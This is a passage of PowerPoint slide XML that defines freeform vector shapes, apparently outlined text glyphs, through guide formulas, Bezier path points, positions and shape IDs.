                <a:gd name="T4" fmla="*/ 34 w 131"/>
                <a:gd name="T5" fmla="*/ 194 h 387"/>
                <a:gd name="T6" fmla="*/ 120 w 131"/>
                <a:gd name="T7" fmla="*/ 29 h 387"/>
                <a:gd name="T8" fmla="*/ 131 w 131"/>
                <a:gd name="T9" fmla="*/ 14 h 387"/>
                <a:gd name="T10" fmla="*/ 116 w 131"/>
                <a:gd name="T11" fmla="*/ 0 h 387"/>
                <a:gd name="T12" fmla="*/ 0 w 131"/>
                <a:gd name="T13" fmla="*/ 194 h 387"/>
                <a:gd name="T14" fmla="*/ 40 w 131"/>
                <a:gd name="T15" fmla="*/ 323 h 387"/>
                <a:gd name="T16" fmla="*/ 116 w 131"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 131 w 131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373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="366"/>
                    <a:pt x="128" y="364"/>
                    <a:pt x="119" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="316"/>
                    <a:pt x="34" y="250"/>
                    <a:pt x="34" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="144"/>
                    <a:pt x="53" y="75"/>
                    <a:pt x="120" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="24"/>
                    <a:pt x="131" y="22"/>
                    <a:pt x="131" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="10"/>
                    <a:pt x="129" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="0"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="253"/>
                    <a:pt x="22" y="298"/>
                    <a:pt x="40" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="360"/>
                    <a:pt x="104" y="387"/>
                    <a:pt x="116" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="387"/>
                    <a:pt x="131" y="377"/>
                    <a:pt x="131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7" name="Freeform 902">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42734A0C-371A-4E62-A707-4251AAB8617A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2265363" y="4357688"/>
              <a:ext cx="90488" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 223"/>
                <a:gd name="T2" fmla="*/ 179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59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8" name="Freeform 903">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3862EE7F-7BBB-4BC3-8826-79BDA34578B4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2371725" y="4318000"/>
              <a:ext cx="115888" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 250"/>
                <a:gd name="T1" fmla="*/ 158 h 305"/>
                <a:gd name="T2" fmla="*/ 142 w 250"/>
                <a:gd name="T3" fmla="*/ 87 h 305"/>
                <a:gd name="T4" fmla="*/ 77 w 250"/>
                <a:gd name="T5" fmla="*/ 113 h 305"/>
                <a:gd name="T6" fmla="*/ 77 w 250"/>
                <a:gd name="T7" fmla="*/ 20 h 305"/>
                <a:gd name="T8" fmla="*/ 57 w 250"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 21 w 250"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 250"/>
                <a:gd name="T13" fmla="*/ 15 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 250"/>
                <a:gd name="T15" fmla="*/ 30 h 305"/>
                <a:gd name="T16" fmla="*/ 43 w 250"/>
                <a:gd name="T17" fmla="*/ 30 h 305"/>
                <a:gd name="T18" fmla="*/ 43 w 250"/>
                <a:gd name="T19" fmla="*/ 274 h 305"/>
                <a:gd name="T20" fmla="*/ 21 w 250"/>
                <a:gd name="T21" fmla="*/ 274 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 250"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 250"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 99 w 250"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 250"/>
                <a:gd name="T29" fmla="*/ 290 h 305"/>
                <a:gd name="T30" fmla="*/ 99 w 250"/>
                <a:gd name="T31" fmla="*/ 274 h 305"/>
                <a:gd name="T32" fmla="*/ 77 w 250"/>
                <a:gd name="T33" fmla="*/ 274 h 305"/>
                <a:gd name="T34" fmla="*/ 77 w 250"/>
                <a:gd name="T35" fmla="*/ 186 h 305"/>
                <a:gd name="T36" fmla="*/ 139 w 250"/>
                <a:gd name="T37" fmla="*/ 117 h 305"/>
                <a:gd name="T38" fmla="*/ 173 w 250"/>
                <a:gd name="T39" fmla="*/ 161 h 305"/>
                <a:gd name="T40" fmla="*/ 173 w 250"/>
                <a:gd name="T41" fmla="*/ 274 h 305"/>
                <a:gd name="T42" fmla="*/ 153 w 250"/>
                <a:gd name="T43" fmla="*/ 274 h 305"/>
                <a:gd name="T44" fmla="*/ 133 w 250"/>
                <a:gd name="T45" fmla="*/ 290 h 305"/>
                <a:gd name="T46" fmla="*/ 153 w 250"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 230 w 250"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 250 w 250"/>
                <a:gd name="T51" fmla="*/ 290 h 305"/>
                <a:gd name="T52" fmla="*/ 229 w 250"/>
                <a:gd name="T53" fmla="*/ 274 h 305"/>
                <a:gd name="T54" fmla="*/ 207 w 250"/>
                <a:gd name="T55" fmla="*/ 274 h 305"/>
                <a:gd name="T56" fmla="*/ 207 w 250"/>
                <a:gd name="T57" fmla="*/ 15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07" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="108"/>
                    <a:pt x="182" y="87"/>
                    <a:pt x="142" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="87"/>
                    <a:pt x="87" y="104"/>
                    <a:pt x="77" y="113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4"/>
                    <a:pt x="107" y="274"/>
                    <a:pt x="99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4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="274"/>
                    <a:pt x="133" y="274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30" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="305"/>
                    <a:pt x="250" y="305"/>
                    <a:pt x="250" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250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9" name="Freeform 904">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A304E280-565C-47DD-99A2-B0BB55CD7BCA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2501900" y="4357688"/>
              <a:ext cx="107950" cy="10477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7 h 223"/>
                <a:gd name="T12" fmla="*/ 86 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 223"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 37 h 223"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 223"/>
                <a:gd name="T18" fmla="*/ 58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1 h 223"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 223"/>
                <a:gd name="T28" fmla="*/ 83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59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59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1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1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0" name="Freeform 905">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{881F0244-3F49-4829-BC1B-CD8A7E927624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2616200" y="4359275"/>
              <a:ext cx="104775" cy="101600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1" name="Freeform 906">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB06EF5A-D3B2-45D5-A698-923429EC8250}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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2865438" y="4338638"/>
              <a:ext cx="88900" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 194"/>
                <a:gd name="T1" fmla="*/ 133 h 215"/>
                <a:gd name="T2" fmla="*/ 159 w 194"/>
                <a:gd name="T3" fmla="*/ 161 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 194"/>
                <a:gd name="T5" fmla="*/ 169 h 215"/>
                <a:gd name="T6" fmla="*/ 194 w 194"/>
                <a:gd name="T7" fmla="*/ 153 h 215"/>
                <a:gd name="T8" fmla="*/ 187 w 194"/>
                <a:gd name="T9" fmla="*/ 139 h 215"/>
                <a:gd name="T10" fmla="*/ 128 w 194"/>
                <a:gd name="T11" fmla="*/ 107 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 194"/>
                <a:gd name="T13" fmla="*/ 78 h 215"/>
                <a:gd name="T14" fmla="*/ 194 w 194"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 174 w 194"/>
                <a:gd name="T17" fmla="*/ 45 h 215"/>
                <a:gd name="T18" fmla="*/ 112 w 194"/>
                <a:gd name="T19" fmla="*/ 81 h 215"/>
                <a:gd name="T20" fmla="*/ 114 w 194"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 97 w 194"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 81 w 194"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 82 w 194"/>
                <a:gd name="T27" fmla="*/ 81 h 215"/>
                <a:gd name="T28" fmla="*/ 28 w 194"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 17 w 194"/>
                <a:gd name="T31" fmla="*/ 45 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 194"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 12 w 194"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 67 w 194"/>
                <a:gd name="T37" fmla="*/ 107 h 215"/>
                <a:gd name="T38" fmla="*/ 13 w 194"/>
                <a:gd name="T39" fmla="*/ 136 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 194"/>
                <a:gd name="T41" fmla="*/ 153 h 215"/>
                <a:gd name="T42" fmla="*/ 20 w 194"/>
                <a:gd name="T43" fmla="*/ 169 h 215"/>
                <a:gd name="T44" fmla="*/ 82 w 194"/>
                <a:gd name="T45" fmla="*/ 133 h 215"/>
                <a:gd name="T46" fmla="*/ 81 w 194"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 97 w 194"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 114 w 194"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 112 w 194"/>
                <a:gd name="T53" fmla="*/ 13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15">
                  <a:moveTo>
                    <a:pt x="112" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="150"/>
                    <a:pt x="124" y="140"/>
                    <a:pt x="159" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="169"/>
                    <a:pt x="173" y="169"/>
                    <a:pt x="177" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="169"/>
                    <a:pt x="194" y="160"/>
                    <a:pt x="194" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="144"/>
                    <a:pt x="188" y="140"/>
                    <a:pt x="187" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="131"/>
                    <a:pt x="141" y="114"/>
                    <a:pt x="128" y="107"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="181" y="78"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="75"/>
                    <a:pt x="194" y="71"/>
                    <a:pt x="194" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="60"/>
                    <a:pt x="194" y="45"/>
                    <a:pt x="174" y="45"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="68"/>
                    <a:pt x="114" y="35"/>
                    <a:pt x="114" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="16"/>
                    <a:pt x="114" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="0"/>
                    <a:pt x="81" y="16"/>
                    <a:pt x="81" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="35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5"/>
                    <a:pt x="20" y="45"/>
                    <a:pt x="17" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="45"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="6" y="74"/>
                    <a:pt x="12" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="140"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="169"/>
                    <a:pt x="20" y="169"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="82" y="133"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="146"/>
                    <a:pt x="81" y="179"/>
                    <a:pt x="81" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="198"/>
                    <a:pt x="81" y="215"/>
                    <a:pt x="97" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="215"/>
                    <a:pt x="114" y="198"/>
                    <a:pt x="114" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="179"/>
                    <a:pt x="113" y="146"/>
                    <a:pt x="112" y="1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2" name="Freeform 907">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF0CFBCE-51AB-4A9F-AECB-7F92FC8B6291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2986088" y="4357688"/>
              <a:ext cx="88900" cy="104775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3" name="Freeform 908">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F4E5B2E-8945-46CA-806F-9B6AD376FEAE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3095625" y="4330700"/>
              <a:ext cx="96838" cy="1317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4 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 21 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 64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7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1" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="62"/>
                    <a:pt x="0" y="62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4" name="Freeform 909">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA326F4-FFDA-4FEC-8443-ABB9D6391D60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3217863" y="4359275"/>
              <a:ext cx="104775" cy="101600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5" name="Freeform 910">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22B8D742-DFD6-4836-80B7-848361B1D62B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3371850" y="4430713"/>
              <a:ext cx="38100" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 42 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 63 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17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51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44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8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  <a:cubicBezTo>
                    <a:pt x="83" y="20"/>
                    <a:pt x="64" y="0"/>
                    <a:pt x="42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44" y="63"/>
                    <a:pt x="48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6" name="Freeform 911">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA0A7D9A-7F76-4CF7-9365-159EE190B1CB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3587750" y="4357688"/>
              <a:ext cx="88900" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 223"/>
                <a:gd name="T2" fmla="*/ 78 w 193"/>
                <a:gd name="T3" fmla="*/ 86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8 h 223"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 75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2 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 223"/>
                <a:gd name="T28" fmla="*/ 98 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 223"/>
                <a:gd name="T30" fmla="*/ 34 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 223"/>
                <a:gd name="T32" fmla="*/ 17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2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2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="78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4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7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8" y="95"/>
                    <a:pt x="112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7" name="Freeform 912">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD702678-6829-4546-A55C-DFC1B5EBA623}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId199"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3708400" y="4318000"/>
              <a:ext cx="87313" cy="142875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1 h 306"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 91 h 306"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 106 h 306"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 306"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 306"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 306"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 306"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 291 h 306"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 306 h 306"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 306 h 306"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 291 h 306"/>
                <a:gd name="T24" fmla="*/ 168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6"/>
                    <a:pt x="112" y="91"/>
                    <a:pt x="95" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25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6"/>
                    <a:pt x="13" y="306"/>
                    <a:pt x="21" y="306"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168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8" name="Freeform 913">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D93C313-EA53-4E73-93FF-C57D8F9EF631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3819525" y="4359275"/>
              <a:ext cx="101600" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 208 w 221"/>
                <a:gd name="T1" fmla="*/ 37 h 215"/>
                <a:gd name="T2" fmla="*/ 219 w 221"/>
                <a:gd name="T3" fmla="*/ 17 h 215"/>
                <a:gd name="T4" fmla="*/ 198 w 221"/>
                <a:gd name="T5" fmla="*/ 0 h 215"/>
                <a:gd name="T6" fmla="*/ 29 w 221"/>
                <a:gd name="T7" fmla="*/ 0 h 215"/>
                <a:gd name="T8" fmla="*/ 8 w 221"/>
                <a:gd name="T9" fmla="*/ 20 h 215"/>
                <a:gd name="T10" fmla="*/ 8 w 221"/>
                <a:gd name="T11" fmla="*/ 43 h 215"/>
                <a:gd name="T12" fmla="*/ 25 w 221"/>
                <a:gd name="T13" fmla="*/ 63 h 215"/>
                <a:gd name="T14" fmla="*/ 43 w 221"/>
                <a:gd name="T15" fmla="*/ 43 h 215"/>
                <a:gd name="T16" fmla="*/ 43 w 221"/>
                <a:gd name="T17" fmla="*/ 30 h 215"/>
                <a:gd name="T18" fmla="*/ 167 w 221"/>
                <a:gd name="T19" fmla="*/ 30 h 215"/>
                <a:gd name="T20" fmla="*/ 11 w 221"/>
                <a:gd name="T21" fmla="*/ 178 h 215"/>
                <a:gd name="T22" fmla="*/ 0 w 221"/>
                <a:gd name="T23" fmla="*/ 198 h 215"/>
                <a:gd name="T24" fmla="*/ 21 w 221"/>
                <a:gd name="T25" fmla="*/ 215 h 215"/>
                <a:gd name="T26" fmla="*/ 210 w 221"/>
                <a:gd name="T27" fmla="*/ 215 h 215"/>
                <a:gd name="T28" fmla="*/ 221 w 221"/>
                <a:gd name="T29" fmla="*/ 194 h 215"/>
                <a:gd name="T30" fmla="*/ 221 w 221"/>
                <a:gd name="T31" fmla="*/ 165 h 215"/>
                <a:gd name="T32" fmla="*/ 204 w 221"/>
                <a:gd name="T33" fmla="*/ 145 h 215"/>
                <a:gd name="T34" fmla="*/ 186 w 221"/>
                <a:gd name="T35" fmla="*/ 165 h 215"/>
                <a:gd name="T36" fmla="*/ 186 w 221"/>
                <a:gd name="T37" fmla="*/ 184 h 215"/>
                <a:gd name="T38" fmla="*/ 52 w 221"/>
                <a:gd name="T39" fmla="*/ 184 h 215"/>
                <a:gd name="T40" fmla="*/ 208 w 221"/>
                <a:gd name="T41" fmla="*/ 3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1" h="215">
                  <a:moveTo>
                    <a:pt x="208" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="27"/>
                    <a:pt x="219" y="25"/>
                    <a:pt x="219" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="0"/>
                    <a:pt x="208" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="8" y="4"/>
                    <a:pt x="8" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="43"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="52"/>
                    <a:pt x="8" y="63"/>
                    <a:pt x="25" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="63"/>
                    <a:pt x="43" y="53"/>
                    <a:pt x="43" y="43"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="178"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="188"/>
                    <a:pt x="0" y="189"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="215"/>
                    <a:pt x="11" y="215"/>
                    <a:pt x="21" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="210" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="212"/>
                    <a:pt x="221" y="202"/>
                    <a:pt x="221" y="194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="221" y="165"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="156"/>
                    <a:pt x="221" y="145"/>
                    <a:pt x="204" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="145"/>
                    <a:pt x="186" y="155"/>
                    <a:pt x="186" y="165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="186" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208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89" name="Freeform 915">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6154FD3B-65EC-4975-82B2-1EBBCCEEE627}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId201"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3944938" y="4357688"/>
              <a:ext cx="93663" cy="104775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8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0" name="Rectangle 916">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3331AA6-6D90-40DA-A2DA-3726C04F6489}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId202"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4065588" y="4451350"/>
              <a:ext cx="73025" cy="9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1" name="Freeform 917">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
